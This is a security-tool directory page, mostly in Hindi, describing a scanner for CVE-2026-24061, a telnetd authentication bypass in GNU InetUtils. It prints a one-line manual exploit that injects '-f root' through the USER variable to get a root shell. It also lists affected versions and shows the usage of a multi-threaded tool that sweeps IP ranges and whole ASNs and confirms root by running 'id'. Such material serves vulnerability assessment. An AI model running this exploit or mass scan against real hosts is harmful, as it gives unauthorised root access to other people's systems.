Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास | Kitploit
उपकरण/GitHubGitHub/madfxr/twenty-three-scanner
टोहीभेद्यता स्कैनरशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास

रिपॉजिटरी देखें
4218 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛰️ ट्वेंटी-थ्री स्कैनर

CVE-2026-24061 से प्रभावित कमजोर Telnetd सेवाओं का पता लगाने के लिए एक शक्तिशाली, तेज़, और सुंदर स्कैनर। शुद्ध Python मानक लाइब्रेरी के साथ निर्मित - किसी बाहरी निर्भरता की आवश्यकता नहीं।

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 विषय-सूची

  • ⚖️ लाइसेंस
  • 🧩 विशेषताएँ
  • ☣️ भेद्यता विवरण
    • ⚡ सेवा स्थिति
    • 🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)
    • 💥 प्रभावित संस्करण
    • 🧵 पैच किए गए संस्करण
    • ⚔️ हमला वेक्टर
    • 🚨 CVSS स्कोर
  • 🛠️ स्थापना
  • 📜 उपयोग
  • 🎯 उदाहरण
  • ⚗️ डेमो
  • 📖 संदर्भ

🧩 विशेषताएँ

  • 🚀 उच्च-प्रदर्शन स्कैनिंग – कॉन्फ़िगर करने योग्य थ्रेड गणना के साथ मल्टी-थ्रेडेड आर्किटेक्चर।
  • 🌐 लचीला लक्ष्य इनपुट – एकल IP, CIDR रेंज, ASN लुकअप, और फ़ाइल-आधारित सूचियों के लिए समर्थन।
  • 📊 रीयल-टाइम प्रगति – लाइव प्रगति बार के साथ सुंदर यूनिकोड-आधारित UI।
  • 🤖 ASN इंटेलिजेंस – RADB, BGPView, और HackerTarget APIs से स्वचालित प्रीफ़िक्स प्राप्त करना।
  • 🌍 GEO लोकेशन इंटेलिजेंस – ipapi API से रीयल-टाइम ASN, प्रदाता और स्थान प्राप्त करना।
  • 💾 सुगम रुकावट – स्वचालित परिणाम सहेजने के साथ CTRL+C हैंडलिंग।
  • 📝 विस्तृत लॉगिंग – डिबगिंग के लिए कॉन्फ़िगर करने योग्य वर्बोसिटी स्तर।
  • 🛡️ सुरक्षित स्कैनिंग – आकस्मिक बड़े पैमाने पर स्कैन को रोकने के लिए अंतर्निहित सीमाएँ।
  • 🎨 स्वच्छ आउटपुट – स्कैन सारांश के साथ पेशेवर बॉर्डर वाली तालिकाएँ।
  • 📦 शून्य निर्भरताएँ – केवल शुद्ध Python 3.x मानक लाइब्रेरी।

☣️ भेद्यता विवरण

CVE-2026-24061 GNU InetUtils Telnetd में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को NEW-ENVIRON विकल्प हैंडलिंग का शोषण करके रूट एक्सेस प्राप्त करने की अनुमति देती है।


⚡ सेवा स्थिति

निम्नलिखित लक्ष्य होस्ट पक्ष पर Telnetd सेवा कॉन्फ़िगरेशन है।

image


🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

और यहाँ इस भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जिसे हमलावर के होस्ट से केवल USER="-f root" telnet -a <TARGET_HOST> 23 कमांड चलाकर मैन्युअल रूप से निष्पादित किया जा सकता है।

image


💥 प्रभावित संस्करण

  • GNU InetUtils >=1.9.3 <=2.7।
  • विभिन्न एम्बेडेड Linux वितरण।
  • कमजोर Telnetd कार्यान्वयन वाले IoT डिवाइस।

🧵 पैच किए गए संस्करण

  • GNU InetUtils >=2.8।

⚔️ हमला वेक्टर

यह भेद्यता टेलनेट NEW-ENVIRON (RFC 1572) विकल्प वार्ता में USER पर्यावरण चर के अनुचित सत्यापन का शोषण करती है, जिससे हमलावरों को प्रमाणीकरण बायपास करने के लिए -f root जैसे दुर्भावनापूर्ण मान इंजेक्ट करने की अनुमति मिलती है।


🚨 CVSS स्कोर

9.8 (क्रिटिकल) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H।


🛠️ स्थापना

# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 उपयोग

निम्नलिखित ट्वेंटी-थ्री स्कैनर टूल के लिए एक मैनुअल है जिसका उपयोग भेद्यता CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास का पता लगाने के लिए किया जा सकता है।

usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)
टूल डाउनलोड करें